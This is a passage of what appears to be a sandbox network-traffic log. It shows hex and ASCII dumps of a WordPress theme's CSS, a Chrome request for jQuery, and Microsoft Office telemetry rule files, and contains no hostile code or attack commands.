                                                                                                                      Data Ascii: member_details .bio-inner .mobile-close:before,.nectar_team_member_overlay .team_member_details .bio-inner .mobile-close:after,.fancybox-navigation button:hover:before,button[type=submit]:hover,button[type=submit]:focus,body[data-form-submit="see-through"
                                                                                                                      2024-12-03 07:55:20 UTC8000INData Raw: 76 2e 74 6f 6f 6c 74 69 70 20 75 6c 20 6c 69 20 2e 66 70 2d 74 6f 6f 6c 74 69 70 20 2e 74 6f 6f 6c 74 69 70 2d 69 6e 6e 65 72 3a 61 66 74 65 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 20 23 30 66 38 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 62 6f 64 79 20 2e 74 65 73 74 69 6d 6f 6e 69 61 6c 5f 73 6c 69 64 65 72 5b 64 61 74 61 2d 73 74 79 6c 65 3d 22 6d 75 6c 74 69 70 6c 65 5f 76 69 73 69 62 6c 65 22 5d 5b 64 61 74 61 2d 63 6f 6c 6f 72 2a 3d 22 61 63 63 65 6e 74 2d 63 6f 6c 6f 72 22 5d 20 62 6c 6f 63 6b 71 75 6f 74 65 20 2e 62 6f 74 74 6f 6d 2d 61 72 72 6f 77 3a 61 66 74 65 72 2c 62 6f 64 79 20 2e 64 61 72 6b 20 2e 74 65 73 74 69 6d 6f 6e 69 61 6c 5f 73 6c 69 64 65 72 5b 64 61 74 61 2d 73 74 79 6c 65 3d 22 6d 75 6c 74
                                                                                                                      Data Ascii: v.tooltip ul li .fp-tooltip .tooltip-inner:after{border-color:transparent #0f8fff!important;}body .testimonial_slider[data-style="multiple_visible"][data-color*="accent-color"] blockquote .bottom-arrow:after,body .dark .testimonial_slider[data-style="mult
                                                                                                                      2024-12-03 07:55:20 UTC8000INData Raw: 20 70 61 74 68 7b 66 69 6c 6c 3a 23 30 30 35 36 62 33 3b 7d 2e 6e 65 63 74 61 72 2d 63 6f 6c 6f 72 2d 65 78 74 72 61 2d 63 6f 6c 6f 72 2d 32 2c 2e 74 65 73 74 69 6d 6f 6e 69 61 6c 5f 73 6c 69 64 65 72 5b 64 61 74 61 2d 72 61 74 69 6e 67 2d 63 6f 6c 6f 72 3d 22 65 78 74 72 61 2d 63 6f 6c 6f 72 2d 32 22 5d 20 2e 73 74 61 72 2d 72 61 74 69 6e 67 20 2e 66 69 6c 6c 65 64 3a 62 65 66 6f 72 65 2c 64 69 76 5b 64 61 74 61 2d 73 74 79 6c 65 3d 22 6d 69 6e 69 6d 61 6c 22 5d 20 2e 74 6f 67 67 6c 65 2e 65 78 74 72 61 2d 63 6f 6c 6f 72 2d 32 3a 68 6f 76 65 72 20 3e 20 2e 74 6f 67 67 6c 65 2d 74 69 74 6c 65 20 61 2c 64 69 76 5b 64 61 74 61 2d 73 74 79 6c 65 3d 22 6d 69 6e 69 6d 61 6c 22 5d 20 2e 74 6f 67 67 6c 65 2e 65 78 74 72 61 2d 63 6f 6c 6f 72 2d 32 2e 6f 70 65 6e
                                                                                                                      Data Ascii: path{fill:#0056b3;}.nectar-color-extra-color-2,.testimonial_slider[data-rating-color="extra-color-2"] .star-rating .filled:before,div[data-style="minimal"] .toggle.extra-color-2:hover > .toggle-title a,div[data-style="minimal"] .toggle.extra-color-2.open
                                                                                                                      2024-12-03 07:55:20 UTC8000INData Raw: 2d 66 6c 69 63 6b 69 74 79 5b 64 61 74 61 2d 63 6f 6e 74 72 6f 6c 73 3d 22 74 6f 75 63 68 5f 74 6f 74 61 6c 22 5d 5b 64 61 74 61 2d 63 6f 6e 74 72 6f 6c 2d 63 6f 6c 6f 72 3d 22 65 78 74 72 61 2d 63 6f 6c 6f 72 2d 33 22 5d 20 2e 76 69 73 75 61 6c 69 7a 65 64 2d 74 6f 74 61 6c 20 73 70 61 6e 2c 2e 6e 65 63 74 61 72 2d 70 6f 73 74 2d 67 72 69 64 2d 77 72 61 70 5b 64 61 74 61 2d 6c 6f 61 64 2d 6d 6f 72 65 2d 63 6f 6c 6f 72 3d 22 65 78 74 72 61 2d 63 6f 6c 6f 72 2d 33 22 5d 20 2e 6c 6f 61 64 2d 6d 6f 72 65 3a 68 6f 76 65 72 2c 5b 63 6c 61 73 73 2a 3d 22 20 69 63 6f 6e 2d 22 5d 2e 65 78 74 72 61 2d 63 6f 6c 6f 72 2d 33 2e 69 63 6f 6e 2d 6e 6f 72 6d 61 6c 2c 64 69 76 5b 64 61 74 61 2d 73 74 79 6c 65 3d 22 6d 69 6e 69 6d 61 6c 22 5d 20 2e 74 6f 67 67 6c 65 2e 65
                                                                                                                      Data Ascii: -flickity[data-controls="touch_total"][data-control-color="extra-color-3"] .visualized-total span,.nectar-post-grid-wrap[data-load-more-color="extra-color-3"] .load-more:hover,[class*=" icon-"].extra-color-3.icon-normal,div[data-style="minimal"] .toggle.e
                                                                                                                      2024-12-03 07:55:20 UTC8000INData Raw: 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 72 69 67 68 74 2c 23 38 64 38 66 38 66 2c 23 38 64 38 66 38 66 29 3b 7d 2e 69 63 6f 6e 2d 6e 6f 72 6d 61 6c 2e 65 78 74 72 61 2d 63 6f 6c 6f 72 2d 67 72 61 64 69 65 6e 74 2d 32 2c 62 6f 64 79 20 5b 63 6c 61 73 73 5e 3d 22 69 63 6f 6e 2d 22 5d 2e 69 63 6f 6e 2d 33 78 2e 61 6c 74 2d 73 74 79 6c 65 2e 65 78 74 72 61 2d 63 6f 6c 6f 72 2d 67 72 61 64 69 65 6e 74 2d 32 2c 2e 6e 65 63 74 61 72 2d 62 75 74 74 6f 6e 2e 65 78 74 72 61 2d 63 6f 6c 6f 72 2d 67 72 61 64 69 65 6e 74 2d 32 3a 61 66 74 65 72 2c 2e 6e 65 63 74 61 72 2d 63 74 61 5b 64 61 74 61 2d 63 6f 6c 6f 72 3d 22 65 78 74 72 61 2d 63 6f 6c 6f 72 2d 67 72 61 64 69 65 6e 74 2d 32 22 5d 3a 6e 6f 74 28 5b 64 61 74 61 2d 73 74
                                                                                                                      Data Ascii: kground:linear-gradient(to right,#8d8f8f,#8d8f8f);}.icon-normal.extra-color-gradient-2,body [class^="icon-"].icon-3x.alt-style.extra-color-gradient-2,.nectar-button.extra-color-gradient-2:after,.nectar-cta[data-color="extra-color-gradient-2"]:not([data-st
                                                                                                                      2024-12-03 07:55:20 UTC8000INData Raw: 64 65 2d 6f 75 74 2d 77 69 64 67 65 74 2d 61 72 65 61 2d 74 6f 67 67 6c 65 20 61 20 2e 63 6c 6f 73 65 2d 6c 69 6e 65 2c 23 73 65 61 72 63 68 2d 6f 75 74 65 72 20 2e 63 6c 6f 73 65 2d 77 72 61 70 20 2e 63 6c 6f 73 65 2d 6c 69 6e 65 2c 23 68 65 61 64 65 72 2d 6f 75 74 65 72 3a 6e 6f 74 28 2e 74 72 61 6e 73 70 61 72 65 6e 74 29 20 23 74 6f 70 20 2e 73 6c 69 64 65 2d 6f 75 74 2d 77 69 64 67 65 74 2d 61 72 65 61 2d 74 6f 67 67 6c 65 20 2e 63 6c 6f 73 65 2d 6c 69 6e 65 2c 2e 6e 65 63 74 61 72 2d 73 6c 69 64 65 2d 69 6e 2d 63 61 72 74 2e 73 74 79 6c 65 5f 73 6c 69 64 65 5f 69 6e 5f 63 6c 69 63 6b 20 2e 63 6c 6f 73 65 2d 63 61 72 74 20 2e 63 6c 6f 73 65 2d 6c 69 6e 65 2c 2e 6e 65 63 74 61 72 2d 61 6a 61 78 2d 73 65 61 72 63 68 2d 72 65 73 75 6c 74 73 20 68 34 20
                                                                                                                      Data Ascii: de-out-widget-area-toggle a .close-line,#search-outer .close-wrap .close-line,#header-outer:not(.transparent) #top .slide-out-widget-area-toggle .close-line,.nectar-slide-in-cart.style_slide_in_click .close-cart .close-line,.nectar-ajax-search-results h4
                                                                                                                      2024-12-03 07:55:20 UTC8000INData Raw: 73 75 62 2d 69 6e 64 69 63 61 74 6f 72 20 69 2c 62 6f 64 79 20 2e 73 66 2d 6d 65 6e 75 20 3e 20 6c 69 20 3e 20 61 3a 61 63 74 69 76 65 20 3e 20 2e 73 66 2d 73 75 62 2d 69 6e 64 69 63 61 74 6f 72 20 69 2c 62 6f 64 79 20 2e 73 66 2d 6d 65 6e 75 20 3e 20 2e 73 66 48 6f 76 65 72 20 3e 20 61 20 3e 20 2e 73 66 2d 73 75 62 2d 69 6e 64 69 63 61 74 6f 72 20 69 2c 62 6f 64 79 20 2e 73 66 2d 6d 65 6e 75 20 6c 69 20 75 6c 20 2e 73 66 48 6f 76 65 72 20 3e 20 61 2c 23 68 65 61 64 65 72 2d 6f 75 74 65 72 20 6e 61 76 20 3e 20 75 6c 20 3e 20 2e 6d 65 67 61 6d 65 6e 75 20 3e 20 75 6c 20 75 6c 20 2e 63 75 72 72 65 6e 74 2d 6d 65 6e 75 2d 69 74 65 6d 20 3e 20 61 2c 23 68 65 61 64 65 72 2d 6f 75 74 65 72 20 6e 61 76 20 3e 20 75 6c 20 3e 20 2e 6d 65 67 61 6d 65 6e 75 20 3e 20
                                                                                                                      Data Ascii: sub-indicator i,body .sf-menu > li > a:active > .sf-sub-indicator i,body .sf-menu > .sfHover > a > .sf-sub-indicator i,body .sf-menu li ul .sfHover > a,#header-outer nav > ul > .megamenu > ul ul .current-menu-item > a,#header-outer nav > ul > .megamenu >
                                                                                                                      2024-12-03 07:55:20 UTC8000INData Raw: 74 2d 61 72 65 61 20 61 2c 62 6f 64 79 20 23 73 6c 69 64 65 2d 6f 75 74 2d 77 69 64 67 65 74 2d 61 72 65 61 2e 66 75 6c 6c 73 63 72 65 65 6e 2d 61 6c 74 20 2e 69 6e 6e 65 72 20 2e 77 69 64 67 65 74 2e 77 69 64 67 65 74 5f 6e 61 76 5f 6d 65 6e 75 20 6c 69 20 61 2c 62 6f 64 79 20 23 73 6c 69 64 65 2d 6f 75 74 2d 77 69 64 67 65 74 2d 61 72 65 61 2e 66 75 6c 6c 73 63 72 65 65 6e 2d 61 6c 74 20 2e 69 6e 6e 65 72 20 2e 6f 66 66 2d 63 61 6e 76 61 73 2d 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 6c 69 20 61 2c 23 73 6c 69 64 65 2d 6f 75 74 2d 77 69 64 67 65 74 2d 61 72 65 61 2e 66 75 6c 6c 73 63 72 65 65 6e 2d 73 70 6c 69 74 20 2e 69 6e 6e 65 72 20 2e 77 69 64 67 65 74 2e 77 69 64 67 65 74 5f 6e 61 76 5f 6d 65 6e 75 20 6c 69 20 61 2c 23 73 6c 69 64 65 2d 6f 75
                                                                                                                      Data Ascii: t-area a,body #slide-out-widget-area.fullscreen-alt .inner .widget.widget_nav_menu li a,body #slide-out-widget-area.fullscreen-alt .inner .off-canvas-menu-container li a,#slide-out-widget-area.fullscreen-split .inner .widget.widget_nav_menu li a,#slide-ou


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      97192.168.2.44985913.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:19 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:19 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:19 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 411
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                      ETag: "0x8DC582B989AF051"
                                                                                                                      x-ms-request-id: 3c5368c0-a01e-00ab-70f2-449106000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075519Z-174f7845968frfdmhC1EWRxxbw00000015q0000000004yg0
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:19 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      98192.168.2.449860196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:19 UTC587OUTGET /wp-content/themes/salient-child/style.css?ver=15.0.6 HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                      Referer: https://www.itnaledi.co.za/
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:20 UTC280INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:20 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Fri, 02 Dec 2022 09:27:05 GMT
                                                                                                                      ETag: "130-5eed4f0dc4c40"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 304
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Type: text/css
                                                                                                                      2024-12-03 07:55:20 UTC304INData Raw: 2f 2a 0d 0a 54 68 65 6d 65 20 4e 61 6d 65 3a 20 53 61 6c 69 65 6e 74 20 43 68 69 6c 64 20 54 68 65 6d 65 0d 0a 44 65 73 63 72 69 70 74 69 6f 6e 3a 20 54 68 69 73 20 69 73 20 61 20 63 75 73 74 6f 6d 20 63 68 69 6c 64 20 74 68 65 6d 65 20 66 6f 72 20 53 61 6c 69 65 6e 74 0d 0a 54 68 65 6d 65 20 55 52 49 3a 20 20 20 68 74 74 70 73 3a 2f 2f 74 68 65 6d 65 66 6f 72 65 73 74 2e 6e 65 74 2f 69 74 65 6d 2f 73 61 6c 69 65 6e 74 2d 72 65 73 70 6f 6e 73 69 76 65 2d 6d 75 6c 74 69 70 75 72 70 6f 73 65 2d 74 68 65 6d 65 2f 34 33 36 33 32 36 36 0d 0a 41 75 74 68 6f 72 3a 20 54 68 65 6d 65 4e 65 63 74 61 72 0d 0a 41 75 74 68 6f 72 20 55 52 49 3a 20 20 68 74 74 70 73 3a 2f 2f 74 68 65 6d 65 66 6f 72 65 73 74 2e 6e 65 74 2f 75 73 65 72 2f 74 68 65 6d 65 6e 65 63 74 61 72
                                                                                                                      Data Ascii: /*Theme Name: Salient Child ThemeDescription: This is a custom child theme for SalientTheme URI: https://themeforest.net/item/salient-responsive-multipurpose-theme/4363266Author: ThemeNectarAuthor URI: https://themeforest.net/user/themenectar


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      99192.168.2.44986113.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:20 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:20 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:20 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 470
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                      ETag: "0x8DC582BBB181F65"
                                                                                                                      x-ms-request-id: 1401d51e-801e-0067-0fb2-42fe30000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075520Z-174f7845968qj8jrhC1EWRh41s00000015gg000000009b5z
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:20 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      100192.168.2.44986213.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:20 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:20 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:20 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 427
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                      ETag: "0x8DC582BB556A907"
                                                                                                                      x-ms-request-id: 4e3832d9-101e-005a-31c5-43882b000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075520Z-174f7845968glpgnhC1EWR7uec00000015v0000000002rmr
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:20 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      101192.168.2.44986313.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:20 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:20 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:20 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 502
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                      ETag: "0x8DC582BB6A0D312"
                                                                                                                      x-ms-request-id: 4680a0b7-201e-003c-6bc7-4330f9000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075520Z-174f7845968psccphC1EWRuz9s00000015z0000000001sd4
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:20 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      102192.168.2.44986413.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:20 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:21 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:20 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 407
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                      ETag: "0x8DC582B9D30478D"
                                                                                                                      x-ms-request-id: b6cdcd34-001e-0014-02c7-435151000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075520Z-174f7845968qj8jrhC1EWRh41s00000015mg000000005kn2
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:21 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      103192.168.2.449865196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:21 UTC566OUTGET /wp-includes/js/jquery/jquery.min.js?ver=3.6.1 HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: */*
                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                      Referer: https://www.itnaledi.co.za/
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:22 UTC298INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:21 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
